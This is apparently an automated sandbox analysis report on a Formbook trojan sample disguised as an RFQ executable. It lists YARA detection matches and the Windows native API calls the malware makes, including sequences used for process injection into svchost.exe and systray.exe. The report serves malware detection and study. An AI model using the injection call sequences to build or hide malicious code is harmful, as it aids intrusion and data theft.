          Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: MKCC-MEC-RFQ-115-2024.exe PID: 7720, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 7752, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: systray.exe PID: 7800, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: This is a third-party compiled AutoIt script. | 1_2_000E3B4C
          Source: MKCC-MEC-RFQ-115-2024.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: MKCC-MEC-RFQ-115-2024.exe, 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_fbeb53f4-3
          Source: MKCC-MEC-RFQ-115-2024.exe, 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_a5fbb633-d
          Source: MKCC-MEC-RFQ-115-2024.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_27bae220-3
          Source: MKCC-MEC-RFQ-115-2024.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_1ab80c4c-0
          Source: initial sampleStatic PE information: Filename: MKCC-MEC-RFQ-115-2024.exe
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A350 NtCreateFile,2_2_0041A350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A400 NtReadFile,2_2_0041A400
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A480 NtClose,2_2_0041A480
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A530 NtAllocateVirtualMemory,2_2_0041A530
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A47F NtClose,2_2_0041A47F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A52A NtAllocateVirtualMemory,2_2_0041A52A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BF0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_03072BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AD0 NtReadFile,LdrInitializeThunk,2_2_03072AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F30 NtCreateSection,LdrInitializeThunk,2_2_03072F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_03072F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,LdrInitializeThunk,2_2_03072FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FE0 NtCreateFile,LdrInitializeThunk,2_2_03072FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E80 NtReadVirtualMemory,LdrInitializeThunk,2_2_03072E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_03072EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,LdrInitializeThunk,2_2_03072D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_03072D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DD0 NtDelayExecution,LdrInitializeThunk,2_2_03072DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03072C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CA0 NtQueryInformationToken,LdrInitializeThunk,2_2_03072CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074650 NtSuspendThread,2_2_03074650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C60 NtCreateKey,2_2_03072C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073090 NtSetValueKey,2_2_03073090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030735C0 NtCreateMutant,2_2_030735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D70 NtOpenThread,2_2_03073D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F1A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,NtClose,2_2_02F1A036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F1A042 NtQueryInformationProcess,2_2_02F1A042
          Source: C:\Windows\explorer.exeCode function: 3_2_10D1DE12 NtProtectVirtualMemory,3_2_10D1DE12
          Source: C:\Windows\explorer.exeCode function: 3_2_10D1C232 NtCreateFile,3_2_10D1C232
          Source: C:\Windows\explorer.exeCode function: 3_2_10D1DE0A NtProtectVirtualMemory,3_2_10D1DE0A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_04D82CA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04D82C70
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82C60 NtCreateKey,LdrInitializeThunk,4_2_04D82C60
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82DD0 NtDelayExecution,LdrInitializeThunk,4_2_04D82DD0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_04D82DF0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82D10 NtMapViewOfSection,LdrInitializeThunk,4_2_04D82D10
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_04D82EA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82FE0 NtCreateFile,LdrInitializeThunk,4_2_04D82FE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82F30 NtCreateSection,LdrInitializeThunk,4_2_04D82F30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82AD0 NtReadFile,LdrInitializeThunk,4_2_04D82AD0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04D82BF0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82BE0 NtQueryValueKey,LdrInitializeThunk,4_2_04D82BE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82B60 NtClose,LdrInitializeThunk,4_2_04D82B60
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D835C0 NtCreateMutant,LdrInitializeThunk,4_2_04D835C0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D84650 NtSuspendThread,4_2_04D84650
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D84340 NtSetContextThread,4_2_04D84340
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82CC0 NtQueryVirtualMemory,4_2_04D82CC0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82CF0 NtOpenProcess,4_2_04D82CF0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82C00 NtQueryInformationProcess,4_2_04D82C00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82DB0 NtEnumerateKey,4_2_04D82DB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82D00 NtSetInformationFile,4_2_04D82D00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82D30 NtUnmapViewOfSection,4_2_04D82D30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82EE0 NtQueueApcThread,4_2_04D82EE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82E80 NtReadVirtualMemory,4_2_04D82E80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82E30 NtWriteVirtualMemory,4_2_04D82E30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82F90 NtProtectVirtualMemory,4_2_04D82F90
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82FB0 NtResumeThread,4_2_04D82FB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82FA0 NtQuerySection,4_2_04D82FA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82F60 NtCreateProcessEx,4_2_04D82F60
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82AF0 NtWriteFile,4_2_04D82AF0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82AB0 NtWaitForSingleObject,4_2_04D82AB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82B80 NtQueryInformationFile,4_2_04D82B80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82BA0 NtEnumerateValueKey,4_2_04D82BA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D83090 NtSetValueKey,4_2_04D83090
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D83010 NtOpenDirectoryObject,4_2_04D83010
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D83D70 NtOpenThread,4_2_04D83D70
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D83D10 NtOpenProcessToken,4_2_04D83D10
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D839B0 NtGetContextThread,4_2_04D839B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E6A350 NtCreateFile,4_2_02E6A350
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E6A480 NtClose,4_2_02E6A480
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E6A400 NtReadFile,4_2_02E6A400
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E6A530 NtAllocateVirtualMemory,4_2_02E6A530
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E6A47F NtClose,4_2_02E6A47F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E6A52A NtAllocateVirtualMemory,4_2_02E6A52A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04C0A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,4_2_04C0A036
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04C09BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,4_2_04C09BAF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04C0A042 NtQueryInformationProcess,4_2_04C0A042
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04C09BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_04C09BB2
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00144021: CreateFileW,DeviceIoControl,CloseHandle,1_2_00144021
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00138858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_00138858
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0014545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_0014545F
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000EE8001_2_000EE800
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0010DBB51_2_0010DBB5
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0016804A1_2_0016804A
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000EE0601_2_000EE060
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000F41401_2_000F4140
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001024051_2_00102405
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001165221_2_00116522
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0011267E1_2_0011267E
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001606651_2_00160665
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0010283A1_2_0010283A
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000F68431_2_000F6843
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001189DF1_2_001189DF
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000F8A0E1_2_000F8A0E
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00116A941_2_00116A94
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00160AE21_2_00160AE2
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00148B131_2_00148B13
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0013EB071_2_0013EB07
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0010CD611_2_0010CD61
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001170061_2_00117006
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000F710E1_2_000F710E
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000F31901_2_000F3190
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000E12871_2_000E1287
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001033C71_2_001033C7
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0010F4191_2_0010F419
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000F56801_2_000F5680
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001016C41_2_001016C4
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001078D31_2_001078D3
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000F58C01_2_000F58C0
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00101BB81_2_00101BB8
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00119D051_2_00119D05
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000EFE401_2_000EFE40
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00101FD01_2_00101FD0
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0010BFE61_2_0010BFE6
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00EF36301_2_00EF3630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E28F2_2_0041E28F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041DB1D2_2_0041DB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041DC792_2_0041DC79
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E57F2_2_0041E57F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D882_2_00402D88
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041DDB72_2_0041DDB7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409E4B2_2_00409E4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409E502_2_00409E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D7702_2_0041D770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA3522_2_030FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F02_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031003E62_2_031003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E02742_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C02C02_2_030C02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030301002_2_03030100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA1182_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C81582_2_030C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F41A22_2_030F41A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031001AA2_2_031001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F81CC2_2_030F81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D20002_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030647502_2_03064750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030407702_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C02_2_0303C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C6E02_2_0305C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030405352_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031005912_2_03100591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E44202_2_030E4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F24462_2_030F2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EE4F62_2_030EE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB402_2_030FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F6BD72_2_030F6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA802_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030569622_2_03056962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A02_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310A9A62_2_0310A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304A8402_2_0304A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030428402_2_03042840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030268B82_2_030268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E8F02_2_0306E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03082F282_2_03082F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060F302_2_03060F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E2F302_2_030E2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F402_2_030B4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BEFA02_2_030BEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC82_2_03032FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304CFE02_2_0304CFE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEE262_2_030FEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040E592_2_03040E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052E902_2_03052E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FCE932_2_030FCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEEDB2_2_030FEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304AD002_2_0304AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DCD1F2_2_030DCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03058DBF2_2_03058DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303ADE02_2_0303ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040C002_2_03040C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0CB52_2_030E0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030CF22_2_03030CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F132D2_2_030F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D34C2_2_0302D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0308739A2_2_0308739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030452A02_2_030452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C02_2_0305B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED2_2_030E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307516C2_2_0307516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F1722_2_0302F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B16B2_2_0310B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304B1B02_2_0304B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF0CC2_2_030EF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C02_2_030470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F70E92_2_030F70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF0E02_2_030FF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF7B02_2_030FF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030856302_2_03085630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F16CC2_2_030F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F75712_2_030F7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DD5B02_2_030DD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031095C32_2_031095C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF43F2_2_030FF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030314602_2_03031460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFB762_2_030FFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FB802_2_0305FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B5BF02_2_030B5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307DBF92_2_0307DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFA492_2_030FFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7A462_2_030F7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B3A6C2_2_030B3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DDAAC2_2_030DDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03085AA02_2_03085AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E1AA32_2_030E1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EDAC62_2_030EDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D59102_2_030D5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030499502_2_03049950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B9502_2_0305B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD8002_2_030AD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030438E02_2_030438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFF092_2_030FFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041F922_2_03041F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFFB12_2_030FFFB1
